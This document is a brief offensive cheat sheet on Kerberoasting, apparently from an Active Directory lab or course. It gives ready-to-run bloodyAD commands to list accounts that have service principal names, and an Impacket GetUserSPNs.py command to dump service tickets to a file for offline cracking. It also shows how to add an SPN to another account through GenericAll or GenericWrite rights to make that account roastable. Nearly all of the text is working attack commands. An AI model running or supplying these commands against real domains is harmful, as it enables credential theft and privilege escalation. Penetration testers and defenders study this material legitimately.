Kerberoasting
List kerberoastable users
bash
bloodyAD -u studentuser19 -d us.techcorp.local -p password --host 192.168.1.2 get search --filter '(servicePrincipalName=*)' --attr distinguishedName --base CN=Users,DC=us,DC=techcorp,DC=localKerberoast all accounts
bash
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip KeyDistributionCenter 'DOMAIN/USER:Password'Targeted Kerberoasting
If an attacker controls an account with the rights to add an SPN to another (GenericAll, GenericWrite), it can be abused to make that other account vulnerable to Kerberoast.
bash
bloodyAD -u studentuser19 -d us.techcorp.local -p password --host 192.168.1.2 set object "Support19User" servicePrincipalName -v "US/support19userSPN"WARNING
the new SPN should be unique in the domain